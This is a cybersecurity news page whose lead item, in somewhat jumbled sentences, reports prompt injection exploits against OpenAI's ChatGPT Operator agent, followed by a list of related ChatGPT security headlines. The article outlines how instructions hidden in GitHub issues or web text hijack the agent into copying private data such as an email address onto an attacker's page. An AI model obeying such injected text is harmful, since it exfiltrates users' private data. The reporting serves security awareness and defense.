ChatGPT Operator Prompt Injection Exploit Leaking Private Data

OpenAI’s ChatGPT Operator, a cutting-edge research preview tool designed for ChatGPT Pro users, has recently come under scrutiny for vulnerabilities that could expose sensitive personal data through prompt injection exploits. Navigating to Sensitive Pages: The attacker tricks the Operator into accessing authenticated pages containing sensitive personal information (PII), such as email addresses or phone numbers. For example, in one demonstration, the Operator was tricked into extracting a private email address from a user’s YC Hacker News account and pasting it into a third-party server’s input field. Out-of-Band Confirmation Requests: When crossing website boundaries or executing complex actions, Operator displays intrusive confirmation dialogues explaining the potential risks. Since Operator sessions run server-side, OpenAI potentially has access to session cookies, authorization tokens, and other sensitive data. Additionally, websites could adopt measures to block AI agents from accessing sensitive pages by identifying them through unique User-Agent headers. Inline Confirmation Requests: For certain actions, the Operator requests user confirmation within the chat interface before proceeding. Hijacking Operator via Prompt Injection: Malicious instructions are hosted on platforms like GitHub issues or embedded in website text. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Leaking Data via Third-Party Websites: Operators are further manipulated to copy this information and paste it into a malicious web page that captures the data without requiring a form submission. Despite these measures, prompt injection attacks remain partially effective due to their probabilistic nature—both the attacks and defenses depend on specific conditions being met. Kaaviya is a Security Editor and fellow reporter with Cyber Security News.

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 18 Feb 2025 06:40:06 +0000


Cyber News related to ChatGPT Operator Prompt Injection Exploit Leaking Private Data

XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT - With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information. In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ...
1 year ago Imperva.com
How to perform a proof of concept for automated discovery using Amazon Macie | AWS Security Blog - After reviewing the managed data identifiers provided by Macie and creating the custom data identifiers needed for your POC, it’s time to stage data sets that will help demonstrate the capabilities of these identifiers and better understand how ...
4 months ago Aws.amazon.com
Forget Deepfakes or Phishing: Prompt Injection is GenAI's Biggest Problem - Cybersecurity professionals and technology innovators need to be thinking less about the threats from GenAI and more about the threats to GenAI from attackers who know how to pick apart the design weaknesses and flaws in these systems. Chief among ...
1 year ago Darkreading.com
How enterprises are using gen AI to protect against ChatGPT leaks - ChatGPT is the new DNA of shadow IT, exposing organizations to new risks no one anticipated. Enterprise workers are gaining a 40% performance boost thanks to ChatGPT based on a recent Harvard University study. A second study from MIT discovered that ...
1 year ago Venturebeat.com
ChatGPT Operator Prompt Injection Exploit Leaking Private Data - OpenAI’s ChatGPT Operator, a cutting-edge research preview tool designed for ChatGPT Pro users, has recently come under scrutiny for vulnerabilities that could expose sensitive personal data through prompt injection exploits. Navigating to ...
4 days ago Cybersecuritynews.com
How Are Security Professionals Managing the Good, The Bad and The Ugly of ChatGPT? - ChatGPT has emerged as a shining light in this regard. Already we're seeing the platform being integrated into corporate systems, supporting in areas such as customer success or technical support. The bad: The risks surrounding ChatGPT. Of course, ...
1 year ago Cyberdefensemagazine.com
How AI can be hacked with prompt injection: NIST report - As AI proliferates, so does the discovery and exploitation of AI cybersecurity vulnerabilities. Prompt injection is one such vulnerability that specifically attacks generative AI. In Adversarial Machine Learning: A Taxonomy and Terminology of Attacks ...
11 months ago Securityintelligence.com
ChatGPT Extensions Could be Exploited to Steal Data and Sensitive Information - API security professionals Salt Security have released new threat research from Salt Labs highlighting critical security flaws within ChatGPT plugins, presenting a new risk for enterprises. Plugins provide AI chatbots like ChatGPT access and ...
11 months ago Itsecurityguru.org
Researchers Uncover Simple Technique to Extract ChatGPT Training Data - Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web? The answer is an emphatic yes, according to ...
1 year ago Darkreading.com
Google Researchers' Attack Prompts ChatGPT to Reveal Its Training Data - A team of researchers primarily from Google's DeepMind systematically convinced ChatGPT to reveal snippets of the data it was trained on using a new type of attack prompt which asked a production model of the chatbot to repeat specific words forever. ...
1 year ago 404media.co
Are you sure you want to share that with ChatGPT? How Metomic helps stop data leaks - Open AI's ChatGPT is one of the most powerful tools to come along in a lifetime, set to revolutionize the way many of us work. Workers aren't content to wait until organizations work this question out, however: Many are already using ChatGPT and ...
1 year ago Venturebeat.com
ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store - On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc. ChatGPT, the AI software, has already taken the Internet by storm, and that is why ...
2 years ago Hackread.com
Locking Down ChatGPT: A User's Guide to Strengthening Account Security - OpenAI officials said that the user who reported his ChatGPT history was a victim of a compromised ChatGPT account, which resulted in the unauthorized logins. OpenAI has confirmed that the unauthorized logins originate from Sri Lanka, according to an ...
1 year ago Cysecurity.news
Google to Announce Chat-GPT Rival On February 8 Event - There seems to be a lot of consternation on Google's part at the prospect of a showdown with ChatGPT on the February 8 event. The search giant has been making moves that suggest it is preparing to enter the market for large language models, where ...
2 years ago Cybersecuritynews.com
OpenAI rolls out imperfect fix for ChatGPT data leak flaw - OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under ...
1 year ago Bleepingcomputer.com
Foreign states already using ChatGPT maliciously, UK IT leaders believe - Most UK IT leaders believe that foreign states are already using the ChatGPT chatbot for malicious purposes against other nations. That's according to a new study from BlackBerry, which surveyed 500 UK IT decision makers revealing that, while 60% of ...
2 years ago Csoonline.com
The Emergence of AI In the Enterprise: Know the Security Risks - As is often the case with any new, emerging technology, using AI comes with security risks, and it's essential to understand them and impose the proper guardrails around them to protect company, customer, and employee data. There are real, tangible ...
1 year ago Cyberdefensemagazine.com
Google Researchers Find ChatGPT Queries Collect Personal Data - The LLMs are evolving rapidly with continuous advancements in their research and applications. Recently, cybersecurity researchers at Google discovered how threat actors can exploit ChatGPT queries to collect personal data. StorageGuard scans, ...
1 year ago Cybersecuritynews.com
Latest Information Security and Hacking Incidents - Private cloud providers may be among the primary winners of today's generative AI gold rush, as CIOs are reconsidering private clouds, whether on-premises or hosted by a partner, after previously dismissing them in favour of public clouds. At the ...
9 months ago Cysecurity.news
Smashing Security podcast #307: ChatGPT and the Minister for Foreign Affairs Graham Cluley - Could a senior Latvian politician really be responsible for scamming hundreds of "Mothers-of-two" in the UK? And should we be getting worried about the AI wonder that is ChatGPT? All this and more is discussed in the latest edition of the "Smashing ...
2 years ago Grahamcluley.com
Hangzhou's Cybersecurity Breakthrough: How ChatGPT Elevated Ransomware Resolution - The Chinese media reported on Thursday that local police have arrested a criminal gang from Hangzhou who are using ChatGPT for program optimization to carry out ransomware attacks for the purpose of extortion. An organization in the Shangcheng ...
1 year ago Cysecurity.news
One Year of ChatGPT: Domains Evolved by Generative AI - ChatGPT has recently completed one year after its official launch. Since it introduced the world to the future, by showing what a human-AI interaction looks like, ChatGPT has eventually transformed the entire tech realm into a cultural phenomenon. ...
1 year ago Cysecurity.news
Google DeepMind Researchers Uncover ChatGPT Vulnerabilities - Scientists at Google DeepMind, leading a research team, have adeptly utilized a cunning approach to uncover phone numbers and email addresses via OpenAI's ChatGPT, according to a report from 404 Media. This discovery prompts apprehensions regarding ...
1 year ago Cysecurity.news
Why I Chose Google Bard to Help Write Security Policies - COMMENTARY. Ever since large language models like ChatGPT burst onto the scene a year ago, there have been a flurry of use cases for leveraging them in enterprise security environments. From the operational, such as analyzing logs, to assisting ...
1 year ago Darkreading.com
Chinese authorities arrest four in ransomware case involving ChatGPT - Four alleged cyberattackers have been arrested in mainland China for developing ransomware with the help of ChatGPT, the first case of its sort in the country. The South China Morning Post reported Friday that the suspects were arrested in November ...
1 year ago Siliconangle.com

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)